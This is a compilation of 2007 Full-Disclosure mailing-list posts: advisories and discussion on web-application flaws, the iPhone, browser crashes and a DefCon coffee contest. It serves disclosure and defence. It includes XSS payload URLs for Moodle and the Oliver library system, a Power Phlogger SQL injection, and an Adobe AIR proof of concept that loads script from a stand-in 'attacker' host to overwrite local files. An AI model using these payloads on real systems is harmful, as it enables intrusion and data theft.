[Full-disclosure] POWER PHLOGGER v.2.2.5 (username) SQL Injection
POWER PHLOGGER v.2.2.5 (username) SQL Injection Author: Attila Gerendi (Darkz) Date: June 25, 2007 Package: POWER PHLOGGER (http://www.phpee.com/) Versions Affected: v.2.2.5 (Other versions may also be affected) Severity: SQL Injection Description: Input passed to the username parameter in login.php isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass login sequence. This SQL injection is blind so the user can not produce variations in the server input however using BENCHMARK it still can be used to retrieve sensitive data from the database and/or heavily load the server and produce DDOS attack. The vulnerable code piece is in /include/get_userdata.php /* assign the user's values */ $sql = SELECT * FROM .PPHL_TBL_USERS. WHERE id='$id' OR username='$id'; $res = mysql_query($sql); the vulnerable parameter at this point is $id and it is set trough session variable $username from login.php without any sanitation. Status: The product web page say: Active development of PowerPhlogger has been stopped as of August 2006. The announced successor Phlogger3 will not be released. Also, I am not able to provide you with support for any previous version., so any user using this version should correct the bug herself. Solution: modify /* assign the user's values */ $sql = SELECT * FROM .PPHL_TBL_USERS. WHERE id='$id' OR username='$id'; $res = mysql_query($sql); to /* assign the user's values */ $id = mysql_escape_string($id); $sql = SELECT * FROM .PPHL_TBL_USERS. WHERE id='$id' OR username='$id'; $res = mysql_query($sql); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] High Risk Flaw in Sun's Java Web Start
John Heasman of NGSSoftware has discovered a high risk vulnerability in Sun Microsystem's Java Web Start that ships with the JRE and JDK on Windows platforms. The vulnerability affects the following version of Java Web Start: Java Web Start in JDK and JRE 5.0 Update 11 and earlier Java Web Start in SDK and JRE 1.4.2_13 and earlier This vulnerability permits an untrusted Java Web Start application to overwrite any file that can be accessed under the application user context. This ultimately enables an untrusted application to break out of the sandbox by modifying the user's Java security policy. An untrusted application could be launched via a malicious web page. Details *** The JNLP API defines a set of services that bypass the security sandbox to enable some common client operations. The BasicService is used to discover the application's codebase. Then, the PersistenceService caches content on the local hard drive, keyed to a URL that is relative to the application's base. The name/value pairs provided by the PersistenceService are similar to browser cookies. The Java Web Start implementation honours this legacy by naming the pairs muffins. Arbitrary files can be written to due to a directory traversal flaw in the PersistenceService. Solution This issue has now been resolved; further details are available at: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102957-1 NGSSoftware Insight Security Research http://www.ngssoftware.com http://www.databasesecurity.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
matthew wollenweber wrote: I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. Its incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one. Without doubt, we are in for some interesting discoveries. -- /** * Robert Clark ** * Technical Student ALICE/DAQ * Software Engineer CERN PH/AID */ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure
Dear [EMAIL PROTECTED], 1. MustLive (mustlive at websecurity.com dot ua) reported crossite scripting vulnerability in Moodle 1.7.1 via search parameter of index.php, example: http://host/user/index.php?contextid=4roleid=0id=2group=perpage=20search=%22style=xss:expression(alert(document.cookie))%20 Detailed information (in Ukranian) http://websecurity.com.ua/1045/ Original message (in Russian) http://securityvulns.ru/Rdocument391.html 2. Durito [damagelab] (durito at mail dot ru) reported information leak in Liesbeth base CMS (Vendor: www.doubleflex.com), example: http://host/config.inc file accessible through Web contains sensitive information, including database account. Original message (in Russian) http://securityvulns.ru/Rdocument392.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Jim Popovitch wrote: The US DoD gets hit all the time... not because they are so much insecure, but because they are such a primary target. It's a fact of life, just like doctors and nurses are the most vulnerable to contract a disease. There are precautions, and they are taken, but the odds are greater. _AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_. The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Buffer overflow in HP Instant Support Driver Check (SDD) ActiveX control
John Heasman of NGSSoftware has discovered a high risk vulnerability in the HP Instant Support Driver Check (SDD) ActiveX control, which is marked safe for scripting. The vulnerability affects the following version of the SDD control: HP Instant Support Driver Check versions prior to 1.5.0.3 This vulnerability could be exploited on a malicious web page in order to execute arbitrary code under the user context of the browser. Details *** The queryHub([IN] BSTR bstrValue) method contains a stack based buffer overflow. Solution This issue has now been resolved in version 1.5.0.3. Further details are available at: http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597 NGSSoftware Insight Security Research http://www.ngssoftware.com http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Nick FitzGerald wrote: _AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_. The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it... An also *informed* number of members realize the potential of gaining greater budgets by leaving machines vulnerable in an effort to lobby congress for yet more pork barrel money to secure these networks from uber hackers. So let's sift through crapaganda while its on the table shall we. /* SNIP */ “China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD’s Non-Classified IP Router Network),” said Maj. Gen. William Lord, director of information, services and integration in the Air Force’s Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.gcn.com/print/25_25/41716-1.html) /* END SNIP */ 20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would need some massive pipes to download this all undetected. Let's analyze the comment and the logic... 20 terabytes on an OC3 would take you 291 hours 44 minutes and 16 seconds give or take. Gigabit Ethernet, 45 hours 30 minutes and change... So how did they manage do achieve this marvelous feat of magic undetected. It obviously couldn't be at high speeds which means they would have had to either go on undetected for quite some time, or they embedded fiber taps INSIDE of a DoD location (doubtable). 20 terabytes... I'll tell you what I think usually happens with DoD and governmental sectors... Private corporations and those in them slacking (http://cryptome.org/cg-leakage.htm). Do I blame DoD, absolutely. I take a different view of this altogether under a what if I was a contractor with no one monitoring me... Dictating to secretary: We need another million for these uh golf... *scratch that* for these vertically integrated, high end clustered reverse path packet injection token based AES FIPS standardized firewalls. Its cutting edge technology which guarantees and mitigates against unauthorized intrusions. The government should undertake a *real* method to secure their infrastucture. Have it revamped by industry experts and implemented by those same experts. Not some deep pocket contractors who will skim so much of the money away and into accounts in the triple borders. (reality... like it or not) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Sec-1 Ltd] Buffer Truncation Abuse in Microsoft SQL Server Based Applications
Buffer Truncation Abuse in Microsoft SQL Server Based Applications Release Date: 3rd July 2007 Author: Gary O'Leary-Steele Web Site: www.sec-1.com This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principal of this technique has existed for some time; however we hope this paper we will provide an insight of how a variation of the technique can be adopted to attack common forgotten password functionality within web applications. Our initial intention was to release this paper along with a case study demonstrating the flaw within a commercial application. However since the vendor has yet to fix the flaw it was decided that an initial censored release will be followed up with the complete release further down the line. The paper can be downloaded here: http://www.sec-1labs.co.uk/papers/BTA_CensoredRelease.pdf Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] This pages crashes browsers
Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. http://www.movincool.com/portable-air-conditioner/officepro60.php# ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This pages crashes browsers
Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. Printed from IE7 and FF 2.0.0.4 no problems. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
Actually the guys over at: http://iphone.fiveforty.net/wikihttp://iphone.fiveforty.net/wiki/index.php?title=Special:Confirmemail/bc89b850ecfa38723bc811a4fa8ce092are pretty far along of mounting the iPhone. The can read a files from a sandbox setup on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface. Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do more and be more open. Reinventing the wheel by writing new firmware seems like a lose-lose situation. On 7/3/07, Robert Clark [EMAIL PROTECTED] wrote: matthew wollenweber wrote: I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. Its incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one. Without doubt, we are in for some interesting discoveries. -- /** * Robert Clark ** * Technical Student ALICE/DAQ * Software Engineer CERN PH/AID */ -- Matthew Wollenweber [EMAIL PROTECTED] | [EMAIL PROTECTED] www.cyberwart.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This pages crashes browsers
The crash happens in mshtml so it could easily be version dependent. IE6 W2K here. Geo. Printed from IE7 and FF 2.0.0.4 no problems. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
From what I understand of the phone it is running a native version of OS X. Which may mean to say its running the underlying BSD kernel of 'Darwin' with a modified Aqua (which is their impementation of XWindows) on top. As with any type of blackbox testing you must go with the 'knowns' to find the 'unknowns' (yai!!). Learn what the points of ingress are from the device it self, i.e. is safari still vulnerable and maybe can be used as a gateway into the directory structure? Or can you write code to use safari in that manner? If not then you must take a closer look inside the phone. One thing is certain, at some point a developer needed a way into the phone to do proper debugging, maybe not a JTAG interface on this device but some type of 'shell'. I have seen certain sites where people have taken apart the device and have started to peer into it. I do know that their no SDK for the device but it does have a fully functional Safari browser which will allow for AJAX so quick start coding ;0 m matthew wollenweber wrote: I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of smartphones that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything with a *nix OS underneath is just too tempting to leave alone. Unfortunately Apple threw a curve ball that's outside my skill set. The iPhone doesn't mount as a harddrive. I couldn't find any options in iTunes and in linux I only got: Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using ehci_hcd and address 15 Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 choices USB device drivers aren't my thing. Anyone have any suggestions on how to get the thing mounted or to go about figuring out how to do so? Thanks for any help. -- Matthew Wollenweber [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] | [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] www.cyberwart.com http://www.cyberwart.com ___ Dailydave mailing list [EMAIL PROTECTED] http://lists.immunitysec.com/mailman/listinfo/dailydave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CoffeeWars 8
Eight. A Fibonacci number. The first prime, cubed. The number of bits in a byte. The number of days in one of the Beatles' weeks. The number of fluid ounces in a cup. -- (subtle foreshadowing) These are all interesting and important facts about the number eight, but in a moment they will seem puny and insignificant compared to what is about to be revealed. Brace yourself. Ensure that you are wearing safety goggles to protect your eyes, gloves to protect your hands, and other appropriate safety items for protection. Check to be sure that you are wearing two pairs of socks, because the first pair is about to get knocked right off. Eight is also the number of this year's CoffeeWars. That is correct, DefCon attendees. For the past se7en years (ha!), on Friday morning when the con begins, and everyone is trying to get through the registration lines so they can buy the black t-shirts they've been dreaming about all year, we've been hard at work. Each year, intrepid contestants bring their beans from the far corners of the earth. We take those beans. We treat them with respect. We apply a standard grinding and brewing technique honed and perfected through a lifetime of experience and-- as has been mentioned-- the previous seven coffee battles. A select team of experienced, refined, and opinionated judges will sample each brew and arrive (by blind voting) at the answer to the universally acknowledged most important question of the year: Which hacker has the best coffee of them all? In the novel FOR EVERY SIN, Aharon Appelfeld tells the story of camp refugees coping with the immediate aftermath of release at the end of World War II. The following conversation takes place between the main character and a woman he meets along his way: ...Drink, dearie, this coffee revives the soul Thank you. I have nothing to give you. No need. I'm glad to be serving it. If there is some meaning to life, it's coffee. [Appelfeld, Aharon. FOR EVERY SIN. New York: Vintage, 1989. p. 58] There it is, my friends. There it absolutely is. And so we issue our annual invitation: furnish your own lives with additional meaning by joining in our contest. The rules are few, simple, and obvious. 1: ONLY WHOLE BEANS. No pre-ground stuff. No crystals. Beans are the only acceptable entry. We recommend submitting about 1/2 lb, so there is enough in case of a mishap. 2: BEANS MUST BE UNFLAVORED. We are into coffee- flavored coffee, not hazelnut-blueberry-acetone- whatever. 3: WE ONLY DO COFFEEWARS. We don't know who is in charge of other aspects of the con, we cannot answer questions about other events, etc. 4: NO DECAF. By all that is sacred. Please. 5: YOUR ENTRY WILL BECOME OURS, unless you make a plan with us at the time you submit it to recover the leftovers at the end of the contest. Sorry-- it is just too much to keep track of otherwise. 6. ONLY ONE ENTRY PER CONTESTANT. So lead with your best. So feel the pride. Bring your favorite beans, and see how they measure up against the rest of the hacker coffee field. This is one of the craziest contest ideas ever, and you'll feel happy and fulfilled for having played a part in this, the eighth instantiation. Plus, you just might win. Somebody will, after all. The contest will begin when the con begins, and it will end when we can't take it any more, or when we run out of coffee, whichever comes first. There is probably some upper limit to the amount of coffee that the judges can consume, so serious entrants may wish to ensure their beans a slot by pre-registering. Just send e-mail to foofus at foofus dot net, and we'll set aside an entry form for you. Good luck, and see you at the con. --Foofus. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Top 5 most Popular Web2.0 Services Hackers Cannot live Without
http://www.gnucitizen.org/blog/the-top-5-most-popular-web20-services-hackers-cannot-live-without Let's have a look at the top 5 most popular Web2.0 services hackers cannot live without. This listing is based on my personal research that was also presented at OWASP Web Application Security Conference 2007 in Italy. The articles covers: Yahoo Pipes Dapper Feed43 Zoho Creator Google Reader enjoy -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Dailydave] iPhone Roadblock
matthew wollenweber wrote: Actually the guys over at: http://iphone.fiveforty.net/wikihttp://iphone.fiveforty.net/wiki/index.php?title=Special:Confirmemail/bc89b850ecfa38723bc811a4fa8ce092are pretty far along of mounting the iPhone. The can read a files from a sandbox setup on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface. Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do more and be more open. Reinventing the wheel by writing new firmware seems like a lose-lose situation. Reinventing and modifying to remove roadblocks are two very different things. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security on AIR: Local file access through JavaScript
Hi! It's just a very first look to AIR (Adobes Integrated Runtime) and its possibilities to process HTML/JS. AIR is beta by now, so Adobe may change things in the final release. ## What is AIR? Quote from Adobe: Adobe Integrated Runtime (AIR) is a cross- operating system runtime that allows you to leverage your existing web development skills (Flash, Flex, HTML, JavaScript, Ajax) to build and deploy Rich Internet Applications (RIAs) to the desktop. ## Some security related informations on AIR: - The installer throws a warning about it's ability for unrestricted system access (so it's not a real surprise what AIR apps are capable of) - AIR uses WebKit as renderer on both supported platforms, Windows and MacOS - AIR introduces some JavaScript functions to access file systems and remote services, file SQL queries and open sockets - SWF files in the AIR application sandbox can cross-script any SWF file from any domain - Remote SWF files can only read files inside the security sandbox - SWF/ActionScript objects can access DOM and JavaScript (and vice versa I guess) - External JavaScript sources can be included and executed ## File access In general every file on local file system can be accessed by AIR apps. This includes reading, writing, appending or deletion as well as testing for file and directory existence. Another interesting feature is the possibility to overwrite calling files inside compiled AIR application during runtime. ## Example (only tested on OSX so far) For this to work in a real world scenario a service used by an AIR app must be vulnerable to a persistant XSS (or another typical vulnerability), and the app needs to call data in a way that payloads gets rendered and executed. This basic example consists of 4 files: - AIR application descriptor file: App.xml - Calling HTML file inside the AIR app package: caller.html - Malicious external JavaScript: overwrite.js - A file which just contains aliases for AIR runtime: AIRAliases.js (part of AIR SDK) # App.xml ?xml version=1.0 encoding=UTF-8? application xmlns=http://ns.adobe.com/air/application/1.0.M4; appId=air.poc.overwrite version=0.1 nameAIR Overwrite/name rootContent systemChrome=standard visible=truecaller.html/ rootContent /application # caller.html # For lazyness reasons the JS is included straight away # But it also works if exploited and included during runtime html head titleAIR Overwrite/title script src=AIRAliases.js type=text/javascript/script script src=http://attacker/overwrite.js; type=text/javascript/ script /head body onload=remoteLoad() h1local data/h1 /body /html # overwrite.js function remoteLoad(){ var localFile = air.File.documentsDirectory; localFile = localFile.resolve(/local/path/to/aip/resources/ caller.html); // i.e. on MacOS: /Applications/AIR-overwrite.air/Contents/ Resources/caller.html var localFileStream = new air.FileStream(); localFileStream.open(localFile, air.FileMode.APPEND); localFileStream.writeUTFBytes(data from remote); } To compile, the AIR SDK must be installed (beside the actual runtime). The bin of the SDK dir contains ADT, a command-line tool to generate AIR files: $ adt -package AIR-overwrite.air App.xml AIRAliases.js caller.html After installing and running AIR-overwrite.app, data from remote is appended to caller.html. Another interesting point for overwriting inside AIR apps could be META-INF/application.xml which contains the pointers to the resources or certificates. The example is kinda lame, I know. With such remote access much fancier stuff is imaginable. But what I found somehow funny is the fact that AIR doesn't have any mechanism to recognize changes to its own files. ## Conclusion Macromedia/Adobe Flash has a long history of bad or no security, so AIR seems to stay in that long tradition. By introducing those PNDF (Potentially Dangerous Native Functions - thanks to Wisec for making up this term :) Adobe opens new vectors XSS can cause. Stuff like SameOrigin policies and access restrictions are there for a very good and known reason. Adobe seem to know about the security implications as they describe in their developer docs, but nonetheless it doesn't makes it any better from my point of view. There are already some real world services/sites offering AIR where exploitation works the way described. ## URLs: - AIR installer http://labs.adobe.com/downloads/air.html - AIR SDK http://labs.adobe.com/downloads/airsdk.html fukami -- SektionEins GmbH http://sektioneins.de ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DNS Pinning Explained
http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html If you want to catch up on attacking internal Web sites by circumventing the same origin policy with Anti DNS Pinning, this is the right place to go. -- Christian Matthies http://christ1an.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cross Site Scripting in Oliver Library Management System
BACKGROUND == Oliver is the web-based Library Management System for Schools. Softlink has built on the understanding of thousands of school clients, over many years, and has designed a new system for school libraries and learning resource centres in the 21st century -- from http://www.softlink.co.uk: DETAILS === During a penetration test for an educational institution, several XSS vulnerabilities were found in their Oliver installations. Due to the test constraints it was not possible to ascertain the exact version of the product, but all instances that have been tested have been found trivially vulnerable Some of the vulnerable input fields include: 1) GET parameters http://www.victim.com/oliver/gateway/gateway.exe?X_=000fapplication=Oliverdisplayform=mainupdateform=;scriptalert(XSS);/script http://www.victim.com/oliver/gateway/gateway.exe?X_=000fdisplayform=main;scriptalert(XSS);/script 2) POST parameters in search forms In the Basic Search page, the following parameters are vulnerable: - TERMS - database - srchad - SuggestedSearch - searchform As a Proof-Of-Concept exploit, the following string can be appended to any of the listed parameters: scriptalert(xss);/script 3) Username login field: The application also fails to properly filter the username parameter, as can be seen when passing to the application the following string as username: --scriptalert(xss)/script VENDOR RESPONSE === 15/06/2007 Vendor contacted. No response received 25/06/2007 Vendor contacted for the second time. No response received 03/07/2007 Advisory published ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DNS Pinning Explained
On 7/3/07, christ1an [EMAIL PROTECTED] wrote: http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html you're giving me (F5) DynDNS headaches. nscd tweaks, -Dsun.net.inetaddr.ttl..., rare indeed for a client to handle DNS pinning properly. heh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This pages crashes browsers
Sounds like a buggy print driver and not a buggy browser. - Eric Sites -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Larry Seltzer Sent: Tuesday, July 03, 2007 10:06 AM To: Geo.; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] This pages crashes browsers Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. Printed from IE7 and FF 2.0.0.4 no problems. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Old as in, I heard about it June 21, 2007 when the story surfaced... you are now enlightening us a whole week and a half later.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This pages crashes browsers
I'm fine Doesn't crash by me. On 7/3/07, Eric Sites [EMAIL PROTECTED] wrote: Sounds like a buggy print driver and not a buggy browser. - Eric Sites -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Larry Seltzer Sent: Tuesday, July 03, 2007 10:06 AM To: Geo.; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] This pages crashes browsers Found this page, click on Accessories then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. Printed from IE7 and FF 2.0.0.4 no problems. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=14 http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Damn it I hate it when other people are right... On 7/3/07 2:20 PM, secure poon [EMAIL PROTECTED] wrote: Old as in, I heard about it June 21, 2007 when the story surfaced... you are now enlightening us a whole week and a half later.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Worldofwarcraft.com - Redirection
